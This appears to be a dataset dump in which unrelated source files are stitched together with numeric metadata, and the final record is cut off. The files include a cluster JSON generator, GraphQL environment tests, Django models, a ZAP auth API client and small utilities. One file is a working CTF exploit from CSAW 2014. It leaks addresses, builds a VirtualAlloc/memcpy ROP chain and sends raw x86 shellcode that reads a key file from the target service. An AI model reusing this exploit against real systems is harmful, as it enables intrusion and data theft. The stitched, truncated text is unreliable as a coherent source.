#/usr/bin/env python ''' @2018-01 by lanhin Generate cluster json file. Usage: python2 clustergen.py The output file name is cluster.json ''' import getopt import sys import os def jsonout(fileout, devices, edges, nodelinks): with open(fileout, "wb") as result: outItem = "{\n \"devices\":\n [\n" result.write(outItem) # Write devices for i in range(len(devices)-1): outItem = "\t{\"id\":\""+(str)(devices[i][0])+"\",\n\t\"compute\":\""+(str)(devices[i][1])+"\",\n\t\"RAM\":\""+(str)(devices[i][2])+"\",\n\t\"bw\":\""+(str)(devices[i][3])+"\",\n\t\"loc\":\""+str(devices[i][4])+"\"\n\t},\n" result.write(outItem) outItem = "\t{\"id\":\""+(str)(devices[-1][0])+"\",\n\t\"compute\":\""+(str)(devices[-1][1])+"\",\n\t\"RAM\":\""+(str)(devices[-1][2])+"\",\n\t\"bw\":\""+(str)(devices[-1][3])+"\",\n\t\"loc\":\""+str(devices[-1][4])+"\"\n\t}\n" result.write(outItem) outItem = " ],\n \"links\":\n [\n" result.write(outItem) # Write links for i in range(len(edges)-1): outItem = "\t{\"src\":\""+(str)(edges[i][0])+"\",\n\t\"dst\":\""+(str)(edges[i][1])+"\",\n\t\"bw\":\""+(str)(edges[i][2])+"\"\n\t},\n" result.write(outItem) outItem = "\t{\"src\":\""+(str)(edges[-1][0])+"\",\n\t\"dst\":\""+(str)(edges[-1][1])+"\",\n\t\"bw\":\""+(str)(edges[-1][2])+"\"\n\t}" result.write(outItem) if len(nodelinks) > 0: outItem = ",\n" else: outItem = "\n" result.write(outItem) for i in range(len(nodelinks)-1): outItem = "\t{\"src\":\""+(str)(nodelinks[i][0])+"\",\n\t\"dst\":\""+(str)(nodelinks[i][1])+"\",\n\t\"bw\":\""+(str)(nodelinks[i][2])+"\",\n\t\"BetweenNode\":\"true\"\n\t},\n" result.write(outItem) outItem = "\t{\"src\":\""+(str)(nodelinks[-1][0])+"\",\n\t\"dst\":\""+(str)(nodelinks[-1][1])+"\",\n\t\"bw\":\""+(str)(nodelinks[-1][2])+"\",\n\t\"BetweenNode\":\"true\"\n\t}\n" result.write(outItem) outItem = " ]\n}\n" result.write(outItem) # compute, RAM, bw, network devs = [("1000000", "1048576", "1111490", "1600000"), ("10000000", "1048576", "1342177", "3200000"), ("100000000", "2097152", "1342177", 
"3200000")] # id, output network bandwidth in KB/s comnodes = [(0,1000000), (1,20000000), (2,1000000), (3,1000000), (4,1000000), (5,1000000), (6,1000000), (7,1000000)] # id, compute, RAM, bw, location, network bandwidth devices = list() edges = list() nodelinks = list() if (len(sys.argv)) != 2: print "Usage: python clustergen.py <cluster input file>" exit(1) filein = sys.argv[1] fileout = filein + '.json' print "Input:",filein print "Output:",fileout if os.path.isfile(fileout): os.remove(fileout) with open(filein, "rb") as source: for line in source: # id, index, location splited = line.strip().split(' ') devices.append((int(splited[0]), devs[int(splited[1])][0], devs[int(splited[1])][1], devs[int(splited[1])][2], splited[2], devs[int(splited[1])][3])) for i in range(len(devices)): if int(devices[i][4]) == int(splited[-1]) and devices[i][0] != int(splited[0]): # in the same node bw = min(float(devices[i][-1]), float(devs[int(splited[1])][-1])) edges.append((splited[0], devices[i][0], str(bw))) for i in range(len(comnodes)): for j in range(i+1, len(comnodes)): if j >= len(comnodes): continue nodelinks.append((comnodes[i][0], comnodes[j][0], min(float(comnodes[i][1]), float(comnodes[j][1])))) #print devices #print edges #print nodelinks jsonout(fileout, devices, edges, nodelinks)
37.63
235
0.526707
524
3,763
3.782443
0.204198
0.024218
0.090817
0.086276
0.415237
0.279011
0.098385
0.098385
0.067608
0.067608
0
0.073476
0.193463
3,763
99
236
38.010101
0.579572
0.062184
0
0.16129
1
0
0.273263
0.121025
0
0
0
0
0
0
null
null
0
0.048387
null
null
0.048387
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
abbc16642f88ae7f1504bc4fde9ba1c81bcb930e
19,773
py
Python
packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py
gigabackup/gigantum-client
70fe6b39b87b1c56351f2b4c551b6f1693813e4f
[ "MIT" ]
60
2018-09-26T15:46:00.000Z
2021-10-10T02:37:14.000Z
packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py
gigabackup/gigantum-client
70fe6b39b87b1c56351f2b4c551b6f1693813e4f
[ "MIT" ]
1,706
2018-09-26T16:11:22.000Z
2021-08-20T13:37:59.000Z
packages/gtmapi/lmsrvlabbook/tests/test_environment_queries.py
griffinmilsap/gigantum-client
70fe6b39b87b1c56351f2b4c551b6f1693813e4f
[ "MIT" ]
11
2019-03-14T13:23:51.000Z
2022-01-25T01:29:16.000Z
import pytest import graphene from gtmcore.inventory.inventory import InventoryManager from gtmcore.fixtures import ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV from gtmcore.environment import ComponentManager from gtmcore.environment.bundledapp import BundledAppManager import gtmcore from lmsrvlabbook.tests.fixtures import fixture_working_dir_env_repo_scoped, fixture_working_dir class TestEnvironmentServiceQueries(object): def test_get_environment_status(self, fixture_working_dir, snapshot): """Test getting the a LabBook's environment status""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook10", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook10") { environment { containerStatus imageStatus } } } """ snapshot.assert_match(fixture_working_dir[2].execute(query)) def test_get_base(self, fixture_working_dir_env_repo_scoped, snapshot): """Test getting the a LabBook's base""" # Create labbook query = """ mutation myCreateLabbook($name: String!, $desc: String!, $repository: String!, $base_id: String!, $revision: Int!) 
{ createLabbook(input: {name: $name, description: $desc, repository: $repository, baseId: $base_id, revision: $revision}) { labbook { id name description } } } """ variables = {"name": "labbook-base-test", "desc": "my test 1", "base_id": ENV_UNIT_TEST_BASE, "repository": ENV_UNIT_TEST_REPO, "revision": ENV_UNIT_TEST_REV} snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query, variable_values=variables)) query = """ { labbook(owner: "default", name: "labbook-base-test") { name description environment { base{ id componentId name description readme tags icon osClass osRelease license url languages developmentTools dockerImageServer dockerImageNamespace dockerImageRepository dockerImageTag packageManagers } } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_get_package_manager(self, fixture_working_dir_env_repo_scoped, snapshot): """Test getting the a LabBook's package manager dependencies""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook4", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook4") { environment { packageDependencies { edges { node { id manager package version fromBase } cursor } pageInfo { hasNextPage } } } } } """ # should be null snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) # Add a base image cm = ComponentManager(lb) pkgs = [{"manager": "pip", "package": "requests", "version": "1.3"}, {"manager": "pip", "package": "numpy", "version": "1.12"}, {"manager": "pip", "package": "gtmunit1", "version": "0.2.4"}] cm.add_packages('pip', pkgs) pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"}, {"manager": "conda3", "package": "nltk", "version": '3.2.5'}] cm.add_packages('conda3', pkgs) # Add one package without a version, which should cause an error in the API since version is required pkgs = [{"manager": "apt", "package": "lxml", "version": "3.4"}] 
cm.add_packages('apt', pkgs) query = """ { labbook(owner: "default", name: "labbook4") { environment { packageDependencies { edges { node { id manager package version fromBase } cursor } pageInfo { hasNextPage } } } } } """ r1 = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r1 snapshot.assert_match(r1) query = """ { labbook(owner: "default", name: "labbook4") { environment { packageDependencies(first: 2, after: "MA==") { edges { node { id manager package version fromBase } cursor } pageInfo { hasNextPage } } } } } """ r1 = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r1 snapshot.assert_match(r1) def test_get_package_manager_metadata(self, fixture_working_dir_env_repo_scoped, snapshot): """Test getting the a LabBook's package manager dependencies""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook4meta", description="my first asdf") query = """ { labbook(owner: "default", name: "labbook4meta") { environment { packageDependencies { edges { node { id manager package version fromBase description docsUrl latestVersion } cursor } pageInfo { hasNextPage } } } } } """ # should be null snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) # Add a base image cm = ComponentManager(lb) pkgs = [{"manager": "pip", "package": "gtmunit3", "version": "5.0"}, {"manager": "pip", "package": "gtmunit2", "version": "12.2"}, {"manager": "pip", "package": "gtmunit1", "version": '0.2.1'}] cm.add_packages('pip', pkgs) pkgs = [{"manager": "conda3", "package": "cdutil", "version": "8.1"}, {"manager": "conda3", "package": "python-coveralls", "version": "2.5.0"}] cm.add_packages('conda3', pkgs) r1 = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r1 snapshot.assert_match(r1) def test_package_query_with_errors(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" # Create labbook im = 
InventoryManager() lb = im.create_labbook("default", "default", "labbook5", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook5"){ id checkPackages(packageInput: [ {manager: "pip", package: "gtmunit1", version:"0.2.4"}, {manager: "pip", package: "gtmunit2", version:"100.00"}, {manager: "pip", package: "gtmunit3", version:""}, {manager: "pip", package: "asdfasdfasdf", version:""}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query_with_errors_conda(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook5conda", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook5conda"){ id checkPackages(packageInput: [ {manager: "conda3", package: "cdutil", version:"8.1"}, {manager: "conda3", package: "nltk", version:"100.00"}, {manager: "conda3", package: "python-coveralls", version:""}, {manager: "conda3", package: "thisshouldtotallyfail", version:"1.0"}, {manager: "conda3", package: "notarealpackage", version:""}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query_with_errors_apt(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" # Create labbook im = InventoryManager() lb = im.create_labbook("default", "default", "labbook5apt", description="my first labbook10000") # Create Component Manager cm = ComponentManager(lb) # Add a component cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV) query = """ { labbook(owner: "default", name: "labbook5apt"){ id checkPackages(packageInput: [ {manager: "apt", package: "curl", version:"8.1"}, {manager: "apt", package: "notarealpackage", 
version:""}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook6", description="my first labbook10000") query = """ { labbook(owner: "default", name: "labbook6"){ id checkPackages(packageInput: [ {manager: "pip", package: "gtmunit1", version:"0.2.4"}, {manager: "pip", package: "gtmunit2", version:""}]){ id manager package version isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_package_query_no_version(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for package info""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook6noversion", description="my first labbook10000") # Create Component Manager cm = ComponentManager(lb) cm.add_base(ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_BASE, ENV_UNIT_TEST_REV) query = """ { labbook(owner: "default", name: "labbook6noversion"){ id checkPackages(packageInput: [ {manager: "pip", package: "gtmunit1"}, {manager: "pip", package: "notarealpackage"}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) query = """ { labbook(owner: "default", name: "labbook6noversion"){ id checkPackages(packageInput: [ {manager: "apt", package: "curl"}, {manager: "apt", package: "notarealpackage"}]){ id manager package version latestVersion description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) query = """ { labbook(owner: "default", name: "labbook6noversion"){ id checkPackages(packageInput: [ {manager: "conda3", package: "nltk"}, {manager: "conda3", package: "notarealpackage"}]){ id manager package version latestVersion 
description isValid } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_bundle_app_query(self, snapshot, fixture_working_dir_env_repo_scoped): """Test querying for bundled app info""" im = InventoryManager() lb = im.create_labbook("default", "default", "labbook-bundle", description="my first df") query = """ { labbook(owner: "default", name: "labbook-bundle"){ id environment { bundledApps{ id appName description port command } } } } """ snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) bam = BundledAppManager(lb) bam.add_bundled_app(8050, 'dash 1', 'a demo dash app 1', 'python app1.py') bam.add_bundled_app(9000, 'dash 2', 'a demo dash app 2', 'python app2.py') bam.add_bundled_app(9001, 'dash 3', 'a demo dash app 3', 'python app3.py') snapshot.assert_match(fixture_working_dir_env_repo_scoped[2].execute(query)) def test_base_update_available(self, fixture_working_dir_env_repo_scoped, snapshot): """Test checking if the base is able to be updated""" im = InventoryManager() lb = im.create_labbook('default', 'default', 'labbook-base-test-update') cm = ComponentManager(lb) # Add an old base. 
cm.add_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 1) query = """ { labbook(owner: "default", name: "labbook-base-test-update") { name description environment { base{ id revision } baseLatestRevision } } } """ r = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r assert r['data']['labbook']['environment']['base']['revision'] == 1 assert r['data']['labbook']['environment']['baseLatestRevision'] == 2 # We upgrade our base to the latest cm.change_base(gtmcore.fixtures.ENV_UNIT_TEST_REPO, 'quickstart-jupyterlab', 2) r = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r assert r['data']['labbook']['environment']['base']['revision'] == 2 assert r['data']['labbook']['environment']['baseLatestRevision'] == 2 query = """ { labbook(owner: "default", name: "labbook-base-test-update") { name environment { baseLatestRevision } } } """ r = fixture_working_dir_env_repo_scoped[2].execute(query) assert 'errors' not in r assert r['data']['labbook']['environment']['baseLatestRevision'] == 2
39.546
111
0.427603
1,438
19,773
5.683588
0.140473
0.056528
0.068641
0.073412
0.761899
0.724826
0.69387
0.662058
0.638444
0.564786
0
0.018524
0.483993
19,773
499
112
39.625251
0.782515
0.040813
0
0.543529
0
0
0.657899
0.027944
0
0
0
0
0.065882
1
0.025882
false
0
0.018824
0
0.047059
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
abc3eecfb1dec304561dc28f93ae2435fd288309
379
py
Python
automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py
Sale1996/automatization_of_data_mining_project
223aec59231586563a3b125bff064f8420630a8f
[ "MIT" ]
null
null
null
automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py
Sale1996/automatization_of_data_mining_project
223aec59231586563a3b125bff064f8420630a8f
[ "MIT" ]
null
null
null
automatization_of_data_mining_project/data_set_statistic_reporter/classes/statistic_generator/statistic_generator.py
Sale1996/automatization_of_data_mining_project
223aec59231586563a3b125bff064f8420630a8f
[ "MIT" ]
null
null
null
from typing import List class StatisticGenerator(object): def __init__(self, column_names): self.column_names = column_names ''' Function which returns two arrays: 1. Statistic column names 2. Statistic column values for each column name ''' def generate_statistic(self, data_set) -> (List[str], List[str]): pass
27.071429
69
0.643799
45
379
5.222222
0.644444
0.187234
0.12766
0
0
0
0
0
0
0
0
0.007273
0.274406
379
14
70
27.071429
0.847273
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0.166667
0.166667
0
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
abc616e2534ce71688707838c39b33ab9fe3a9aa
869
py
Python
yepes/contrib/standards/models.py
samuelmaudo/yepes
1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb
[ "BSD-3-Clause" ]
null
null
null
yepes/contrib/standards/models.py
samuelmaudo/yepes
1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb
[ "BSD-3-Clause" ]
null
null
null
yepes/contrib/standards/models.py
samuelmaudo/yepes
1ef9a42d4eaa70d9b3e6e7fa519396c1e1174fcb
[ "BSD-3-Clause" ]
null
null
null
# -*- coding:utf-8 -*- from yepes.apps import apps AbstractCountry = apps.get_class('standards.abstract_models', 'AbstractCountry') AbstractCountrySubdivision = apps.get_class('standards.abstract_models', 'AbstractCountrySubdivision') AbstractCurrency = apps.get_class('standards.abstract_models', 'AbstractCurrency') AbstractGeographicArea = apps.get_class('standards.abstract_models', 'AbstractGeographicArea') AbstractLanguage = apps.get_class('standards.abstract_models', 'AbstractLanguage') AbstractRegion = apps.get_class('standards.abstract_models', 'AbstractRegion') class Country(AbstractCountry): pass class CountrySubdivision(AbstractCountrySubdivision): pass class Currency(AbstractCurrency): pass class GeographicArea(AbstractGeographicArea): pass class Language(AbstractLanguage): pass class Region(AbstractRegion): pass
28.032258
102
0.802071
80
869
8.5625
0.3125
0.061314
0.105109
0.183942
0.306569
0.306569
0
0
0
0
0
0.001274
0.096663
869
30
103
28.966667
0.871338
0.023015
0
0.315789
0
0
0.306147
0.234043
0
0
0
0
0
1
0
false
0.315789
0.052632
0
0.368421
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
abcf74d3543dcbf2c7fa1eff397453f8e4095e08
3,044
py
Python
python/api/src/zapv2/auth.py
psiinon/zaproxy-release
5462b14fb337a2d4f68595a207aa3367ec71a671
[ "ECL-2.0", "Apache-2.0", "BSD-3-Clause" ]
1
2017-07-26T18:03:44.000Z
2017-07-26T18:03:44.000Z
python/api/src/zapv2/auth.py
gcxtx/zappy
3d215327addd6f2ea4ca7091a42c330c67fc30ef
[ "ECL-2.0", "Apache-2.0", "BSD-3-Clause" ]
2
2016-02-25T10:06:53.000Z
2016-03-29T07:49:34.000Z
python/api/src/zapv2/auth.py
gcxtx/zappy
3d215327addd6f2ea4ca7091a42c330c67fc30ef
[ "ECL-2.0", "Apache-2.0", "BSD-3-Clause" ]
1
2021-08-17T05:48:59.000Z
2021-08-17T05:48:59.000Z
# Zed Attack Proxy (ZAP) and its related class files. # # ZAP is an HTTP/HTTPS proxy for assessing web application security. # # Copyright 2013 ZAP development team # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This file was automatically generated. """ class auth(object): def __init__(self, zap): self.zap = zap def login_url(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loginUrl/', {'contextId' : contextid}) def login_data(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loginData/', {'contextId' : contextid}) def logged_in_indicator(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loggedInIndicator/', {'contextId' : contextid}) def logout_url(self, contextid): return self.zap._request(self.zap.base + 'auth/view/logoutUrl/', {'contextId' : contextid}) def logout_data(self, contextid): return self.zap._request(self.zap.base + 'auth/view/logoutData/', {'contextId' : contextid}) def logged_out_indicator(self, contextid): return self.zap._request(self.zap.base + 'auth/view/loggedOutIndicator/', {'contextId' : contextid}) def login(self, contextid): return self.zap._request(self.zap.base + 'auth/action/login/', {'contextId' : contextid}) def logout(self, contextid): return self.zap._request(self.zap.base + 'auth/action/logout/', {'contextId' : contextid}) @property def auto_reauth_on(self): return self.zap._request(self.zap.base + 'auth/action/autoReauthOn/').get('autoReauthOn') @property def 
auto_reauth_off(self): return self.zap._request(self.zap.base + 'auth/action/autoReauthOff/').get('autoReauthOff') def set_login_url(self, contextid, url, postdata=''): return self.zap._request(self.zap.base + 'auth/action/setLoginUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata}) def set_login_indicator(self, contextid, indicator): return self.zap._request(self.zap.base + 'auth/action/setLoginIndicator/', {'contextId' : contextid, 'indicator' : indicator}) def set_logout_url(self, contextid, url, postdata=''): return self.zap._request(self.zap.base + 'auth/action/setLogoutUrl/', {'contextId' : contextid, 'url' : url, 'postData' : postdata}) def set_logged_out_indicator(self, contextid, indicator): return self.zap._request(self.zap.base + 'auth/action/setLoggedOutIndicator/', {'contextId' : contextid, 'indicator' : indicator})
42.277778
140
0.703022
389
3,044
5.401028
0.298201
0.099952
0.086625
0.13327
0.443598
0.435031
0.435031
0.435031
0.391242
0.391242
0
0.003145
0.164258
3,044
71
141
42.873239
0.82272
0.23456
0
0.060606
0
0
0.221788
0.105035
0
0
0
0
0
1
0.454545
false
0
0
0.424242
0.909091
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
abd7ebb6a3efed0c59a0bf6d4b58df0c2f293555
307
py
Python
Models/utils.py
Pipe-Runner-Lab/cornell_birdcall_identification
79a807c4a7e368b2ffcb7ecc91176c2bc03f650a
[ "MIT" ]
null
null
null
Models/utils.py
Pipe-Runner-Lab/cornell_birdcall_identification
79a807c4a7e368b2ffcb7ecc91176c2bc03f650a
[ "MIT" ]
7
2021-08-23T20:52:07.000Z
2022-03-12T00:48:51.000Z
Models/utils.py
Pipe-Runner-Lab/cornell_birdcall_identification
79a807c4a7e368b2ffcb7ecc91176c2bc03f650a
[ "MIT" ]
null
null
null
from torch import nn def get_default_fc(num_ftrs,adjusted_classes, params): return nn.Sequential( nn.Linear(num_ftrs, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_0), nn.Linear(1024, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_1), nn.Linear(1024, adjusted_classes) )
34.111111
79
0.703583
50
307
4.08
0.48
0.117647
0.098039
0.117647
0.343137
0.343137
0.343137
0.343137
0.343137
0.343137
0
0.069767
0.159609
307
8
80
38.375
0.72093
0
0
0
0
0
0
0
0
0
0
0
0
1
0.142857
false
0
0.142857
0.142857
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
2
abea45b584c7c99d2b9324078e8fed24a7f61377
369
py
Python
lepoop/entry/not_configured.py
alvinwan/lepoop
a611a4334941527077b1f772d1ac0ae008daedc0
[ "MIT" ]
null
null
null
lepoop/entry/not_configured.py
alvinwan/lepoop
a611a4334941527077b1f772d1ac0ae008daedc0
[ "MIT" ]
null
null
null
lepoop/entry/not_configured.py
alvinwan/lepoop
a611a4334941527077b1f772d1ac0ae008daedc0
[ "MIT" ]
null
null
null
"""Runs when the `poop` alias has not been setup.""" from colorama import init from ..utils import colored from .alias import is_configured from .alias import configure init() def main(): if not is_configured(): configure() print(colored('The `poop` alias was configured successfully.\n' 'Run `source ~/.bashrc` or restart your shell.'))
21.705882
67
0.682927
50
369
5
0.64
0.056
0.096
0
0
0
0
0
0
0
0
0
0.205962
369
16
68
23.0625
0.853242
0.124661
0
0
0
0
0.290221
0
0
0
0
0
0
1
0.1
true
0
0.4
0
0.5
0.1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
2
abfa15dff9f5420c035b3826b1395528ac642299
3,517
py
Python
csaw-2014/exploit/400-1/exploit.py
anarcheuz/CTF
beaccbfe036d90c7d7018978bad288c831d3f8f5
[ "MIT" ]
2
2015-03-24T22:20:08.000Z
2018-05-12T16:41:13.000Z
csaw-2014/exploit/400-1/exploit.py
anarcheuz/CTF
beaccbfe036d90c7d7018978bad288c831d3f8f5
[ "MIT" ]
null
null
null
csaw-2014/exploit/400-1/exploit.py
anarcheuz/CTF
beaccbfe036d90c7d7018978bad288c831d3f8f5
[ "MIT" ]
null
null
null
import socket import re from struct import pack from time import sleep def recv_until(s, string=""): text = "" while 1 : data = s.recv(4096) text+=data if not data or data.find(string) != -1: break return text def leak(s): s.send("A\n") text = recv_until(s, "Selection:") slide, stack = re.findall('0x[0-9a-f]{8}', text) slide = int(slide, 16) + 0x400000 stack = int(stack, 16) return (slide, stack) def vuln(s, payload): s.send("V\n") recv_until(s, "(with some constraints).") s.send(payload) host = '192.168.0.10' s=socket.create_connection((host, 9998)) recv_until(s, "Password:") s.send('GreenhornSecretPassword!!!\n') ### leak recv_until(s, 'Selection:') slide, stack = leak(s) VirtualAlloc = 0x11c0 + slide memcpy = 0x1684 + slide print_output = 0x14d0 + slide pop4 = 0x199e + slide ret = 0x19a2 + slide eip_off = 0x404 buffer_start = stack - 0x3f8 shellcode_loc = buffer_start + 4 shellcode_len = 0x400 ### ROP """cedcl_ convention""" rop = [ VirtualAlloc, #wrapper pop4, 0, 0x1000, 0x40, buffer_start + eip_off + 4 * 8, #will stock ptr to alloc' zone in memcpy 1st arg memcpy, ret, #will return to 1st param 0xcccccccc, shellcode_loc, shellcode_len ] shellcode = [0x55, 0x89, 0xE5, 0x81, 0xEC, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45, 0xFC, 0x64, 0x8B, 0x1D, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x5B, 0x0C, 0x8B, 0x5B, 0x14, 0x8B, 0x1B, 0x8B, 0x1B, 0x8B, 0x5B, 0x10, 0x8B, 0x73, 0x3C, 0x01, 0xDE, 0x8B, 0x76, 0x78, 0x01, 0xDE, 0x56, 0x8B, 0x7E, 0x20, 0x01, 0xDF, 0x8B, 0x4E, 0x14, 0x31, 0xC0, 0x57, 0x51, 0x8B, 0x3F, 0x01, 0xDF, 0xBE, 0xFA, 0x00, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x31, 0xC9, 0xB1, 0x0E, 0xF3, 0xA6, 0x59, 0x5F, 0x74, 0x0B, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00, 0x40, 0xE2, 0xDF, 0x0F, 0x0B, 0x5E, 0x8B, 0x56, 0x24, 0x01, 0xDA, 0xD1, 0xE0, 0x01, 0xD0, 0x31, 0xC9, 0x66, 0x8B, 0x08, 0x8B, 0x46, 0x1C, 0x01, 0xD8, 0xC1, 0xE1, 0x02, 0x01, 0xC8, 0x8B, 0x10, 0x01, 0xDA, 0x5E, 0x89, 0xF7, 0x31, 0xC9, 0x89, 0x55, 0xF8, 0x89, 0x5D, 0xF4, 0xBE, 0x09, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 
0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x89, 0xC3, 0x68, 0x6B, 0x65, 0x79, 0x00, 0x89, 0xE0, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x80, 0x00, 0x00, 0x00, 0x68, 0x03, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x01, 0x00, 0x00, 0x00, 0xB9, 0x00, 0x00, 0x00, 0x80, 0x51, 0x50, 0xFF, 0xD3, 0x81, 0xC4, 0x04, 0x00, 0x00, 0x00, 0x50, 0xBE, 0x15, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x5B, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0x89, 0xE1, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x01, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0x45, 0xFC, 0x8B, 0x80, 0x1E, 0x01, 0x00, 0x00, 0x54, 0xFF, 0xD0, 0x0F, 0x0B, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x41, 0x00, 0x52, 0x65, 0x61, 0x64, 0x46, 0x69, 0x6C, 0x65, 0x00, # exclude last 4 bytes since we want to replace them 0xCC, 0xCC, 0xCC, 0xCC, ][:-4] exploit = "CSAW" #mandatory exploit += "".join([chr(c) for c in shellcode]) exploit += pack("<I", print_output) #print result of ReadFile back to us exploit += "\xcc"*(eip_off - len(exploit)) exploit += "".join([pack("<I", dword) for dword in rop]) vuln(s, exploit) s.shutdown(socket.SHUT_WR) sleep(1) print s.recv(1024)
33.179245
88
0.639181
539
3,517
4.133581
0.402597
0.125673
0.091562
0.043088
0.130162
0.121185
0.084381
0.078995
0.078995
0.046679
0
0.296656
0.209269
3,517
105
89
33.495238
0.504495
0.051464
0
0
0
0
0.037576
0.008485
0
0
0.373636
0
0
0
null
null
0.023529
0.047059
null
null
0.035294
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
abfa9fcc8c8d6fc061a4cea57ebd8295d4f79af3
9,504
py
Python
vnpy/trader/app/spreadTrading/stBase.py
cmbclh/vnpy1.7
25a95ba63c7797e92ba45450d79ee1326135fb47
[ "MIT" ]
1
2017-10-09T06:05:11.000Z
2017-10-09T06:05:11.000Z
vnpy/trader/app/spreadTrading/stBase.py
cmbclh/vnpy-1.7
ccca92139198a0d213c15fe531f37c1c702ee968
